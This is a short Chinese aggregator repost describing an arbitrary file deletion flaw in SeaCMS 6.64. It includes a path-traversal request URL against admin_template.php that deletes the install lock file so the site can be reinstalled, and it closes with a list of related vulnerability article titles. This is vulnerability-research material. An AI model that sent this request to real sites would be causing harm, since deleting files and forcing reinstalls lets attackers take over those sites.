seacms 任意文件删除

Posted 2021-01-07

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了seacms 任意文件删除相关的知识，希望对你有一定的参考价值。

seacms 任意文件删除

http://172.16.173.242/seacms6.64/upload/admin/admin_template.php?action=del&filedir=../templets/../install/install_lock.txt

可以控制filedir参数进行任意文件删除

删除 install/install_lock.txt文件，然后可以重装seacms
技术分享图片

分析代码：

filedir参数必须以../template开头
技术分享图片

以上是关于seacms 任意文件删除的主要内容，如果未能解决你的问题，请参考以下文章

WordPress删除任意文件/执行任意代码安全漏洞临时修复方法

i春秋——“百度杯”CTF比赛九月场——Test（海洋cms / seacms 任意代码执行漏洞）

DedeCMS v5.7 注册用户任意文件删除漏洞

monxin cms 任意文件删除漏洞

Discuz!X 3.4 任意文件删除漏洞复现过程(附python脚本)

monstra 3.0.4 任意文件删除